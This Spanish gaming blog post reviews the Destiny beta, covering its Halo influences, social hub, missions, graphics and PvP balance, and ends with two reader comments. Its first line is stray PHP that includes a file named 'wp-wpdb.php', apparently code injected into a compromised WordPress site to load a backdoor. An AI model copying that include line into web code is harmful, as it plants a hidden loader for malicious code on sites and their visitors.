if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Impresiones beta Destiny – La Fortaleza de LeChuck

Impresiones beta Destiny

Después de abandonar al gigante Microsoft, y a la franquicia que les ha hecho famosos en todo el mundo, Bungie emprendió un viaje en solitario prometiendo en un futuro nuevos retos y mundos para explorar. Tras su presentación en el E3 de 2013, y de su versión Alpha, nos llega un segundo aperitivo con la Beta de Destiny, la cual nos ha dejado cierto aroma halero, y ha obtenido el beneplácito de nuevos jugadores gracias a sus originales características

destiny_beta

Era fácil que me gustara Destiny, me había entrado por los ojos en sus cientos de videos con ese diseño a medio camino entre Halo y Mass Effect, y ahora que le he dedicado un buen puñado de horas no estaba equivocada. La atmósfera de Destiny es misteriosa y envolvente, con elementos «haleros» que los amantes de la vieja saga de la compañía no pasarán por alto. Se dice que Destiny ya se estaba gestando durante Halo 3 ODST e incluso hay un huevo de pascua en un cartel del juego. Recordar esto años después transmite una sensación increíble. Los empleados de Destiny continuaron soltando pistas ocultas en sus numerosas comparecencias públicas hasta que finalmente se anunció.

destiny_halo3_odst
Huevo de pascua de Halo ODST

Nada más acceder al menú de Destiny una melodía y cánticos femeninos nos traen recuerdos del pasado y hacen que me pregunte porqué O’Donnell, encargado de la OST de toda la saga Halo, ha sido despedido de la compañía. El juego comienza con un épico prólogo del avance de la humanidad y la conquista del espacio gracias a un guia llamado «El Viajero«, un elemento con poderes que van más allá de la imaginación. Sin embargo, unos enemigos lo acechan desde generaciones y acaban con el periodo de bonanza, reduciendo a la humanidad drásticamente y confinándola en un pequeño territorio en La Tierra. Los Guardianes somos la última esperanza del planeta, y para luchar contra el enemigo disponemos de la inestimable compañía de unos sabios asistentes llamados espectros, que seguro que a más de un seguidor de Halo le ha recordado a los monitores de las instalaciones. Aquí comienza nuestra historia, y para hacerla nuestra tenemos que crear nuestro personaje. Seleccionaremos el aspecto y luego alguna de las 3 razas a elegir: los humanos, los exos y los insomnes y la clase: Los titanes, los cazadores y los hechiceros. La Torre es lugar que reúne mercaderes, puestos de mando y usuarios, un amplio espacio con una estructura y características similares a La Ciudadela, y casi me engaña la vista y veo una simpática Asari que quería crearme un equipo especial. Desde «La Torre» recibiremos órdenes, podremos mejorar nuestro equipo y ver el ir y venir de numerosos jugadores que estarán haciendo gestiones varias, o bailando con guardianes anónimos, saludando, saltando al vacío e intentando acceder a sitios imposibles. En otras palabras, gente desconocida haciendo el imbécil en masa, cosa que en un comienzo es tan surrealista como divertido, y si tu personajes es femenino ya ni te digo, preparaos para posibles peticiones de amistad y mensajes curiosos.

destiny_beta2
El juego tiene ciclo día/noche, y aquí Museboy nos ofrece un bonito atardecer desde La Torre

El contacto con otros usuarios sigue en las misiones que hacemos alrededor de La Tierra. En la beta tenemos diferentes localizaciones en Rusia para explorar, recuperar objetos y acabar con enemigos. A pesar de que las 7 u 8 disponibles se dividen entre misiones de historia y tiroteo al más puro estilo Halo, no hay apenas diferencia entre unas y otras, y me ha sorprendido que no haya cinemáticas en las de historia, lo que me lleva preguntarme si será de esta manera en el juego final. A diferencia de las misiones de historia, las de tiroteo no acaban. Esto al comienzo no importa y es divertido, ya que en estas últimas hay eventos que surgen de repente y te puedes unir junto a otros jugadores y así cooperar para acabar con un mega bicho, reviviendo a tus compañeros caídos (si quieres o llegas a tiempo) pero a la larga temo que machacar enemigos de la IA será repetitivo y me cansará, y optaré por hacer las de historia y sobre todo jugar en El Crisol. Lo de recorrer el mapa y cruzarte con otros usuarios es genial, algunos siguen su camino, otros deciden seguirte y echarte un cable. Además, es una buena idea incluirlos en el mapa para no perderlos de vista. Si te unes con un amigo, la localización es más visible y la diversión aumenta. Y hablando de jugar con amigos, para mí el gran error de Destiny es no incluir el cooperativo local, algo que no faltó (ni falta) en Halo y proporcionaba una diversión cercana, cosa que me ayudó a descubrir la saga allá por 2009 y disfrutarla en compañía de Museboy. Cuando se le preguntó a Bungie por la ausencia del coop local en Destiny, la compañía se limitó a contestar con cosas como «Es lo que hay», «Deal with it», uniéndose al desinterés creciente de la industria por esta forma tan bonita de jugar con amigos. Parece ser que Nintendo es la única interesada en potenciar siempre el multijugador local y en vez del online.

destiny_beta5

Hablemos ahora de gráficos. Aún notándose el hecho de que Destiny es un juego intergeneracional -saliendo para PS3 y Xbox 360, y también en PS4 y Xbox One- el apartado técnico es impresionante. El esfuerzo artístico detrás es enfermizo, el diseño en los personajes, en los enemigos y los inmensos escenarios, como ya nos tiene acostumbrados Bungie. La iluminación proyecta las sombras de forma real, aumentando el tamaño de estas según nos acercamos al foco de luz. El agua nos refleja en tiempo real todo lo que podemos ver en su campo de visión. Todo esto, de mejor o peor forma, sucede en todas las versiones del juego, siendo su peor versión en PS3 (Bastante borroso y una muy baja resolución), y notándose el gran conocimiento de Bungie en Xbox 360 con una resolución algo más alta y más parecida a la versión de nueva generación.  Bungie lo ha vuelto a hacer, un apartado técnico detallado y robusto y una IA de enemigos a su mejor nivel.

destiny_beta4
Hay diferentes enemigos, los Vándalos son ágiles y poderosos

El modo competitivo/PVP es llamado aquí El Crisol y está integrado con la historia. Desde La Torre hay un simpático robot que te da objetivos y tú y tus compañeros viajáis hacia El Crisol para enfrentaros a otro equipo, en el caso de la beta solo está disponible el modo dominio. Aquí es donde más dudas tengo, ya que he observado una fuerte descompensación con las armas y armaduras, y a pesar de que te juntan con gente de tu nivel, hay personajes que tienen todas las mejoras desbloqueadas y han comprado mejor armamento, y acaban contigo aunque tu hayas atacado antes. Como pasa en juegos como COD, da igual que dispares en el pecho como en la pierna, lo matarás con pocas balas. Lo que apreciaba de Halo, – y de lo que se quejaban muchos jugadores de COD- es que hay que apuntar y no se mata de dos tiros a no ser que hagas diana en la cabezota, y Bungie se ha acercado en este sentido más a COD, hasta el apuntado, y la verdad que este tipo de cosas me echan un poco para atrás. Volviendo al equipo, me temo que al final todo el mundo usará la misma equipación para no estar en inferioridad de condiciones. Espero que de cara a la versión final del juego haya un modo genérico con misma equipación pero conservando poderes de clase de personaje, algo así como el matchmaking de Halo Reach. Tengo que decir que Dominio no es mi modo favorito y no lo suelo escoger en ningún juego, pero aún así es a lo que más he jugado estos días, y supongo que al hacerlo con guiris no lo he disfrutado tanto (además de que he tenido que aguantar deserciones masivas en mi equipo) pero estoy satisfecha con mis resultados personales. Los dos mapas son detallados y hay variedad de vehículos, ahora solo quiero ver todo eso en un modo «Slayer» por equipos, una pena no incluirlo en esta beta pero supongo que ese es el modo estrella y se lo guardan, o lo están depurando. Ahora mismo, para los jugadores más competitivos, Destiny no es un digno candidato, algo que hablaba hoy precisamente con Sylar, ex jugador profesional de Halo, el cual indicaba que aplicar ciertos cambios podrían afectar al modo PVE.

destiny_beta3
El modo competitivo se halla en el Crisol, en la beta disfrutamos del modo Dominio.

Me ha sorprendido como Destiny ha conseguido que jugadores que despreciaban los FPS estén disfrutando de la beta, y es que Destiny fusiona de forma brillante FPS y RPG. Poder ver a tu personaje en tercera persona en La Torre e interactuar con NPC’s y jugadores, además de personalizarlo a tu gusto, es una gran idea. También me gusta que hayan incluido los comandos de acción durante las misiones y poder ver de repente a tu guardián en tercera persona bailando delante de los enemigos en medio de Rusia, mágico. Esta fusión de géneros ha hecho que muchos jugadores no asiduos a los FPS sientan atracción por Destiny. Pude jugar un rato con Xavi (¡Un saludito si me lees!) y me decía que Halo no le llamaba la atención pero que Destiny le está encantando precisamente por poder contar con estos elementos roleros.

¿Qué se le podría pedir a Destiny en el futuro? Pues obviamente que salga para PC. Cada vez que entramos en el menú, inventario o a mercancía de un vendedor aparece un cursor que movemos torpemente con el stick del mando, esto pide a gritos un ratón, señores. Quiero pensar que Bungie ya contempla la posibilidad de lanzar Destiny para PC a corto plazo, ya que a muchos peceros se les haría la boca agua. Además, sé a ciencia cierta que muchos lo están esperando. Me atrevería a vaticinar que para 2015 Destiny estará disponible para PC, pero mientras tanto sigamos con la presión a ver si la compañía ve las infinitas posibilidades y la gran comunidad que espera que Destiny vea la luz en PC.

Destiny apunta a ser lo que prometía, un juego más ambicioso que Halo, más grande, más detallado, y que integra el multijugador cooperativo como ningún otro, haciendo que su nuevo universo se sienta realmente vivo. Por otro lado, esperamos que los desniveles que provocan en el multijugador competitivo tantas armas y poderes diferentes sean subsanados, pues ahora mismo no me parece muy equilibrado. Arreglando eso el competitivo nos recordará a nuestras mejores épocas en Halo. Bungie nos ha vuelto a ganar. Destiny aterrizará el 9 de septiembre, mientras tanto puedes reservar todas las ediciones de Destiny aquí.

Publicada el
Categorizado como Opinión

Por Arashi

Aparte de patear traseros de piratas como gobernadora en Mêlée, soy una fanática de los videojuegos desde que de pequeña me regalaron la Atari 2600. Adoro las aventuras gráficas y los RPG, pero no le hago ascos al resto. Otra de mis pasiones es todo lo relacionado con Japón.

2 comentarios

  1. Yo creo que el juego es un rejunte de varios a la fecha vistos, tiene mucho de bordelands, de halo, cod. tiene un mix de juegos y no soy quien para quejarme pero no logra gustarme del todo. Es cierto que es una beta y que no tengo la suerte de probarlo en consolas nuevas, lo estoy probando en ps3. le doy puntaje de 7.5
    Espero poder probarlo en la nueva generación asi veo la diferencia.

    1. Como tu dices pretende mezclar varios juegos populares para llegar a un nuevo público y no solo los asiduos a los FPS. Habrá que ver como es su versión final y si las misiones de historia varían o son un simple tiroteo sin cinemáticas, porque si es así no me convencerá por mucho que me encante estéticamente.

Dejar un comentario